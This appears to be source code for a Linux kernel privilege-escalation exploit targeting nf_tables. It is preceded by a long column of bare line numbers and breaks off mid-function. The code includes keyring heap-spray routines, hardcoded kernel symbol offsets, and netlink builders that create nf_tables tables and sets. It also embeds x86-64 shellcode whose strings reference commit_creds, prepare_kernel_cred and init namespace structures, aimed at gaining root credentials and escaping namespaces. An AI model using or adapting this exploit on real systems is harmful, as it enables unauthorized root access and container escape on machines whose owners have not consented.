318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <limits.h>
#include <linux/keyctl.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <sys/types.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <semaphore.h>
#include <sched.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/utsname.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>
#include <linux/netlink.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

#include "kernelpwn.h"
#define ID 1337
#define SET_NAME "nameXXX"
#define LEAK_SET_NAME "leakXXX"
#define TABLE_NAME "tableXX"

#define IO_RING_CTX_REF_FREE_OFFSET 0xc4235d // ????????? ffffffff81c4235d t io_ring_ctx_ref_free
#define IO_RSRC_NODE_REF_ZERO_OFFSET 0xc42517 // ????????? ffffffff81c42517 t io_rsrc_node_ref_zero

// spray in kmalloc-64
#define KEY_DESC_MAX_SIZE 40
#define KEY_PAYLOAD_SIZE (32 + 1 - 24)
#define PREFIX_BUF_LEN (16)
#define RCU_HEAD_LEN (16)
#define SPRAY_KEY_CNT (150)

#define FREE_HOLE_BEGIN (100)
#define FREE_HOLE_STEP (10)

#define CORRUPT_SIZE (0x8000)

#define PHYSMAP_MASK 0xffffffff00000000

#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16)

#define PAGE_SIZE 0x1000

struct leak_payload {
uint8_t prefix[PREFIX_BUF_LEN];
uint8_t rcu_buf[RCU_HEAD_LEN];
uint16_t len;
} __attribute__((packed));

struct write_payload {
uint8_t prefix[PREFIX_BUF_LEN];
char *pg_vec;
char *pg_vec2; // in case shellcode is too long
} __attribute__((packed));

typedef int32_t key_serial_t;

void spray_keyring(key_serial_t *id_buffer, uint32_t spray_size) {
char key_desc[0x20];
char key_payload[KEY_PAYLOAD_SIZE + 1] = {0};

for (uint32_t i = 0; i < spray_size; i++) {
snprintf(key_desc, sizeof(key_desc), "spray_key_%d", i);
memset(key_payload, 'A', KEY_PAYLOAD_SIZE);
for (int j = 0; j < 3; j++) {
// retry, after KEYCTL_REVOKE, the key is scheduled for garbage collection,
// so it is not freed immediately
id_buffer[i] = key_alloc(key_desc, key_payload, 0x20);
if (id_buffer[i] < 0) {
usleep(100 * 1000); // 100ms
} else {
break;
}
}

if (id_buffer[i] < 0) {
err_exit("add_key");
}
}
}

uint8_t shellcode[] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,

0x48, 0x8d, 0x3d, 0x00, 0x10, 0x00, 0x00, 0xeb, 0x00, 0x55, 0x41, 0x57,
0x41, 0x56, 0x41, 0x54, 0x53, 0x49, 0x89, 0xfc, 0x48, 0x8d, 0x35, 0xfd,
0x01, 0x00, 0x00, 0x6a, 0x0d, 0x5a, 0xe8, 0x85, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x71, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x48,
0x8d, 0x35, 0xef, 0x01, 0x00, 0x00, 0x6a, 0x14, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x67, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x53, 0x01,
0x00, 0x00, 0x48, 0x63, 0x2b, 0x48, 0x01, 0xdd, 0x48, 0x63, 0x08, 0x48,
0x01, 0xc1, 0x31, 0xff, 0xff, 0xd1, 0x48, 0x89, 0xc7, 0xff, 0xd5, 0x48,
0x8d, 0x35, 0xd3, 0x01, 0x00, 0x00, 0x6a, 0x0a, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x37, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x23, 0x01,
0x00, 0x00, 0x48, 0x89, 0xc3, 0x48, 0x8d, 0x35, 0xbf, 0x01, 0x00, 0x00,
0x6a, 0x09, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0x19, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x05, 0x01, 0x00, 0x00, 0x48, 0x63, 0x0b, 0x48,
0x01, 0xd9, 0x48, 0x63, 0x18, 0x48, 0x01, 0xc3, 0x6a, 0x01, 0x5f, 0xff,
0xd1, 0x48, 0x89, 0xc7, 0x31, 0xf6, 0xff, 0xd3, 0x49, 0x89, 0xc6, 0x48,
0x8d, 0x35, 0x92, 0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0xe3, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xcf, 0x00,
0x00, 0x00, 0x49, 0x89, 0xc7, 0x48, 0x63, 0x18, 0x48, 0x8d, 0x35, 0x7d,
0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0xc2, 0x00,
0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00, 0x00, 0x00, 0x49,
0x01, 0xdf, 0x49, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0,
0x4c, 0x63, 0x10, 0x49, 0x01, 0xc2, 0x49, 0x8d, 0x8f, 0xa0, 0x00, 0x00,
0x00, 0x4c, 0x89, 0xfa, 0x48, 0x39, 0xca, 0x0f, 0x83, 0x88, 0x00, 0x00,
0x00, 0x48, 0x8b, 0x02, 0x4c, 0x39, 0xc0, 0x73, 0x06, 0x48, 0x83, 0xc2,
0x08, 0xeb, 0xe9, 0x48, 0x8d, 0xb0, 0x00, 0x30, 0x00, 0x00, 0x48, 0x89,
0xc7, 0x48, 0x39, 0xf7, 0x73, 0xeb, 0x48, 0x39, 0x07, 0x48, 0x8d, 0x7f,
0x08, 0x75, 0xf2, 0x48, 0x85, 0xc0, 0x74, 0x5d, 0x6a, 0x01, 0x41, 0x5c,
0x49, 0x89, 0xc3, 0x49, 0x39, 0xf3, 0x73, 0x51, 0x4d, 0x8b, 0x0b, 0x4d,
0x39, 0xc1, 0x72, 0x34, 0x4c, 0x39, 0xc8, 0x74, 0x2f, 0x49, 0x8d, 0x49,
0x60, 0x31, 0xd2, 0x31, 0xdb, 0x4c, 0x89, 0xcf, 0x48, 0x39, 0xcf, 0x73,
0x1f, 0x48, 0x8b, 0x2f, 0x4c, 0x39, 0xfd, 0x41, 0x0f, 0x44, 0xd4, 0x4c,
0x39, 0xd5, 0x41, 0x0f, 0x44, 0xdc, 0x48, 0x83, 0xc7, 0x08, 0x85, 0xdb,
0x74, 0xe2, 0x85, 0xd2, 0x74, 0xde, 0xeb, 0x06, 0x49, 0x83, 0xc3, 0x08,
0xeb, 0xb9, 0x4d, 0x85, 0xc9, 0x74, 0x0a, 0x4c, 0x89, 0xc9, 0x48, 0x29,
0xc1, 0x4d, 0x89, 0x0c, 0x0e, 0x31, 0xc0, 0x5b, 0x41, 0x5c, 0x41, 0x5e,
0x41, 0x5f, 0x5d, 0xc3, 0x53, 0x49, 0x89, 0xd0, 0x49, 0xf7, 0xd8, 0x41,
0xb9, 0x00, 0x00, 0x00, 0x02, 0x31, 0xc0, 0x49, 0x89, 0xfb, 0x4e, 0x8d,
0x14, 0x07, 0x4d, 0x01, 0xca, 0x4d, 0x39, 0xd3, 0x77, 0x50, 0x31, 0xc9,
0x48, 0x39, 0xca, 0x74, 0x13, 0x41, 0x8a, 0x1c, 0x0b, 0x3a, 0x1c, 0x0e,
0x75, 0x05, 0x48, 0xff, 0xc1, 0xeb, 0xed, 0x49, 0xff, 0xc3, 0xeb, 0xe1,
0x4d, 0x85, 0xdb, 0x74, 0x31, 0x49, 0x01, 0xf9, 0x48, 0x83, 0xe7, 0xfc,
0x4c, 0x39, 0xcf, 0x73, 0x13, 0x8b, 0x0f, 0x4c, 0x89, 0xdb, 0x48, 0x29,
0xcb, 0x48, 0x39, 0xfb, 0x74, 0x11, 0x48, 0x83, 0xc7, 0x04, 0xeb, 0xe8,
0x49, 0x01, 0xd3, 0x4d, 0x29, 0xd9, 0x4c, 0x89, 0xdf, 0xeb, 0xab, 0x48,
0x83, 0xc7, 0xfc, 0x48, 0x89, 0xf8, 0x5b, 0xc3, 0x63, 0x6f, 0x6d, 0x6d,
0x69, 0x74, 0x5f, 0x63, 0x72, 0x65, 0x64, 0x73, 0x00, 0x70, 0x72, 0x65,
0x70, 0x61, 0x72, 0x65, 0x5f, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x5f,
0x63, 0x72, 0x65, 0x64, 0x00, 0x66, 0x69, 0x6e, 0x64, 0x5f, 0x76, 0x70,
0x69, 0x64, 0x00, 0x70, 0x69, 0x64, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x70, 0x69, 0x64, 0x5f, 0x6e, 0x73, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x75, 0x74, 0x73, 0x5f, 0x6e, 0x73, 0x00};

// ---------------------------------- netlink --------------------------------------
// Netlink messages
#define NETLINK_RECEIVE_BUFFER_SIZE 4096

// Netlink attributes
#define U32_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint32_t))
#define U64_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint64_t))
#define S8_NLA_SIZE (sizeof(struct nlattr) + 8)
#define NLA_BIN_SIZE(x) (sizeof(struct nlattr) + x)
#define NLA_ATTR(attr) ((void *)attr + NLA_HDRLEN)
#define TABLEMSG_SIZE NLMSG_SPACE(sizeof(struct nfgenmsg) + S8_NLA_SIZE)

// get_batch_begin_nlmsg(): Construct a BATCH_BEGIN message for the netfilter netlink
struct nlmsghdr *get_batch_begin_nlmsg(void) {
struct nlmsghdr *nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));
struct nfgenmsg *nfgm = (struct nfgenmsg *)NLMSG_DATA(nlh);
if (!nlh)
err_exit("malloc");

memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = 0;
nlh->nlmsg_seq = 0;

// Used to access to the netfilter tables subsystem
nfgm->res_id = NFNL_SUBSYS_NFTABLES;

return nlh;
}

// get_batch_end_nlmsg(): Construct a BATCH_END message for the netfilter netlink
struct nlmsghdr *get_batch_end_nlmsg(void) {
struct nlmsghdr *nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));
if (!nlh)
err_exit("malloc");

memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
nlh->nlmsg_type = NFNL_MSG_BATCH_END;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = NLM_F_REQUEST;
nlh->nlmsg_seq = 0;

return nlh;
}

// set_nested_attr(): Prepare a nested netlink attribute
struct nlattr *set_nested_attr(struct nlattr *attr, uint16_t type, uint16_t data_len) {
attr->nla_type = type;
attr->nla_len = NLA_ALIGN(data_len + sizeof(struct nlattr));
return (void *)attr + sizeof(struct nlattr);
}

// set_u32_attr(): Prepare an integer netlink attribute
struct nlattr *set_u32_attr(struct nlattr *attr, uint16_t type, uint32_t value) {
attr->nla_type = type;
attr->nla_len = U32_NLA_SIZE;
*(uint32_t *)NLA_ATTR(attr) = htonl(value);

return (void *)attr + U32_NLA_SIZE;
}

// set_u64_attr(): Prepare a 64 bits integer netlink attribute
struct nlattr *set_u64_attr(struct nlattr *attr, uint16_t type, uint64_t value) {
attr->nla_type = type;
attr->nla_len = U64_NLA_SIZE;
*(uint64_t *)NLA_ATTR(attr) = htobe64(value);

return (void *)attr + U64_NLA_SIZE;
}

// set_str8_attr(): Prepare a 8 bytes long string netlink attribute
// @name: Buffer to copy into the attribute
struct nlattr *set_str8_attr(struct nlattr *attr, uint16_t type, const char name[8]) {
attr->nla_type = type;
attr->nla_len = S8_NLA_SIZE;
memcpy(NLA_ATTR(attr), name, 8);

return (void *)attr + S8_NLA_SIZE;
}

// set_binary_attr(): Prepare a byte array netlink attribute
// @buffer: Buffer with data to send
// @buffer_size: Size of the previous buffer
struct nlattr *set_binary_attr(struct nlattr *attr, uint16_t type, uint8_t *buffer, uint64_t buffer_size) {
attr->nla_type = type;
attr->nla_len = NLA_BIN_SIZE(buffer_size);
memcpy(NLA_ATTR(attr), buffer, buffer_size);

return (void *)attr + NLA_ALIGN(NLA_BIN_SIZE(buffer_size));
}

// ---------------------------------- nf_tables --------------------------------------
#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16) // Max size - elemsize - sizeof(nft_set_ext)(align) - min datasize

const uint8_t zerobuf[0x40] = {0};

// create_table(): Register a new table for the inet family
void create_table(int sock, const char *name) {
struct msghdr msg;
struct sockaddr_nl dest_snl;
struct iovec iov[3];
struct nlmsghdr *nlh_batch_begin;
struct nlmsghdr *nlh;
struct nlmsghdr *nlh_batch_end;
struct nlattr *attr;
struct nfgenmsg *nfm;

// Destination preparation
memset(&dest_snl, 0, sizeof(dest_snl));
dest_snl.nl_family = AF_NETLINK;
memset(&msg, 0, sizeof(msg));

// 1. Netlink batch_begin message preparation
nlh_batch_begin = get_batch_begin_nlmsg();

// 2. Netlink table message preparation
nlh = (struct nlmsghdr *)malloc(TABLEMSG_SIZE);
if (!nlh)
err_exit("malloc");

memset(nlh, 0, TABLEMSG_SIZE);
nlh->nlmsg_len = TABLEMSG_SIZE;
nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = NLM_F_REQUEST;
nlh->nlmsg_seq = 0;

nfm = NLMSG_DATA(nlh);
nfm->nfgen_family = NFPROTO_INET;

// Prepare associated attribute
attr = (void *)nlh + NLMSG_SPACE(sizeof(struct nfgenmsg));
set_str8_attr(attr, NFTA_TABLE_NAME, name);

// 3. Netlink batch_end message preparation
nlh_batch_end = get_batch_end_nlmsg();

// IOV preparation
memset(iov, 0, sizeof(struct iovec) * 3);
iov[0].iov_base = (void *)nlh_batch_begin;
iov[0].iov_len = nlh_batch_begin->nlmsg_len;
iov[1].iov_base = (void *)nlh;
iov[1].iov_len = nlh->nlmsg_len;
iov[2].iov_base = (void *)nlh_batch_end;
iov[2].iov_len = nlh_batch_end->nlmsg_len;

// Message header preparation
msg.msg_name = (void *)&dest_snl;
msg.msg_namelen = sizeof(struct sockaddr_nl);
msg.msg_iov = iov;
msg.msg_iovlen = 3;

sendmsg(sock, &msg, 0);

// Free used structures
free(nlh_batch_end);
free(nlh);
free(nlh_batch_begin);
}

/* create_set(): Create a netfilter set
* @sock: Socket used to communicate throught the netfilter netlink
* @set_name: Name of the created set
* @set_keylen: Length of the keys of this set. Used in the exploit to control the used cache
* @data_len: Length of stored data. Used to control the size of the overflow
* @table_name: Name of the table that stores this set
* @id: ID of the created set */
void create_set(int sock, const char *set_name, uint32_t set_keylen, uint32_t data_len, const char *table_name, uint32_t id) {
struct msghdr msg;
struct sockaddr_nl dest_snl;
struct nlmsghdr *nlh_batch_begin;
struct nlmsghdr *nlh_payload;
struct nlmsghdr *nlh_batch_end;
struct nfgenmsg *nfm;
struct nlattr *attr;
uint64_t nlh_payload_size;
struct iovec iov[3];

// Prepare the netlink sockaddr for msg
memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
dest_snl.nl_family = AF_NETLINK;

// 1. First netlink message: batch_begin */
nlh_batch_begin = get_batch_begin_nlmsg();

// 2. Second netlink message : Set attributes */
nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_TABLE
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_NAME
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_ID
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_KEY_LEN
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_FLAGS
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_DATA_TYPE
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_DATA_LEN
nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

// Allocation
nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
if (!nlh_payload)
err_exit("malloc");

memset(nlh_payload, 0, nlh_payload_size);

// Fill the required fields
nlh_payload->nlmsg_len = nlh_payload_size;
nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET;
nlh_payload->nlmsg_pid = getpid();
nlh_payload->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
nlh_payload->nlmsg_seq = 0;

// Setup the nfgenmsg
nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
nfm->nfgen_family = NFPROTO_INET;

// Setup the attributes
attr = (struct nlattr *)((void *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
attr = set_str8_attr(attr, NFTA_SET_TABLE, table_name);
attr = set_str8_attr(attr, NFTA_SET_NAME, set_name);
attr = set_u32_attr(attr, NFTA_SET_ID, id);
attr = set_u32_attr(attr, NFTA_SET_KEY_LEN, set_keylen);
attr = set_u32_attr(attr, NFTA_SET_FLAGS, NFT_SET_MAP);
attr = set_u32_attr(attr, NFTA_SET_DATA_TYPE, 0);
set_u32_attr(attr, NFTA_SET_DATA_LEN, data_len);

// 3. Last netlink message: batch_end
nlh_batch_end = get_batch_end_nlmsg();

// Setup the iovec
memset(iov, 0, sizeof(struct iovec) * 3);
iov[0].iov_base = (void *)nlh_batch_begin;
